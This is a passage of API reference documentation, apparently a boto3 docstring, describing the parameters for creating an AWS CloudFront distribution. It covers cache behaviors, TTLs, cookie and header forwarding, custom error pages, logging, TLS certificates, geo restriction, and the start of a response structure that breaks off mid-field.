files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) -- Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements. Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution. Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items . (dict) --A complex type that describes how CloudFront processes requests. You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used. For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference . If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error. To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element. To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution. For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide . PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution. Note You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / . The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior. For more information, see Path Pattern in the Amazon CloudFront Developer Guide . TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin. (string) -- CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices: CloudFront caches responses to GET and HEAD requests. CloudFront caches responses to GET , HEAD , and OPTIONS requests. If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly. Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests). Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to. (string) -- SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern . DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide . LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior. Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior. Items (list) -- Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items . (dict) --A complex type that contains a Lambda function association. LambdaFunctionARN (string) --The ARN of the Lambda function. EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are: viewer-request origin-request viewer-response origin-response CustomErrorResponses (dict) --A complex type that controls the following: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items . Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration. (dict) --A complex type that controls: Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer. How long CloudFront caches HTTP status codes in the 4xx and 5xx range. For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide . ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration. ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true: The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* . The value of TargetOriginId specifies the value of the ID element for the origin that contains your custom error pages. If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document. We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable. ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example: Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted. If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors. You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down. If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document. ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available. If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document. For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Comment (string) -- [REQUIRED]Any comments you want to include about the distribution. If you don't want to specify a comment, include an empty Comment element. To delete an existing comment, update the distribution configuration and include an empty Comment element. To add or change a comment, update the distribution configuration and specify the new comment. Logging (dict) --A complex type that controls whether access logs are written for the distribution. For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted. IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies . Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations. If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance. For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing . Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. ViewerCertificate (dict) --A complex type that specifies the following: Which SSL/TLS certificate to use when viewers request objects using HTTPS Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names The minimum protocol version that you want CloudFront to use when communicating with viewers For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide . CloudFrontDefaultCertificate (boolean) -- IAMCertificateId (string) -- ACMCertificateArn (string) -- SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients: vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges. sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following: Use the vip option (dedicated IP addresses) instead of sni-only . Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png . If you can control which browser your users use, upgrade the browser to one that supports SNI. Use HTTP instead of HTTPS. Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate . For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following: If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed. If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion . Certificate (string) --Include one of these values to specify the following: Whether you want viewers to use HTTP or HTTPS to request your objects. If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net . If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store. You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate . If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors. If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name: If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority: ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution. IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store. If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod . If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod : vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate. sni-only : CloudFront drops the connection with the browser without returning the object. **If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors: ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins: OriginProtocolPolicyhttps-onlyOriginProtocolPolicy OriginProtocolPolicymatch-viewerOriginProtocolPolicy For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . CertificateSource (string) -- Note This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] . Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content. GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases. RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country: none : No geo restriction is enabled, meaning access to content is not restricted by client geo location. blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content. whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content. Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items . Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ). The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country. CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes. (string) -- WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution. AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide . HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version. For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI). In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.' IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution. In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide . If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true: You enable IPv6 for the distribution You're using alternate domain names in the URLs for your objects For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide . If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request. Tags (dict) -- [REQUIRED]A complex type that contains zero or more Tag elements. Items (list) --A complex type that contains Tag elements. (dict) --A complex type that contains Tag key and Tag value. Key (string) -- [REQUIRED]A string that contains Tag key. The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . Value (string) --A string that contains an optional Tag value. The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . :rtype: dict :return: { 'Distribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'InProgressInvalidationBatches': 123, 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 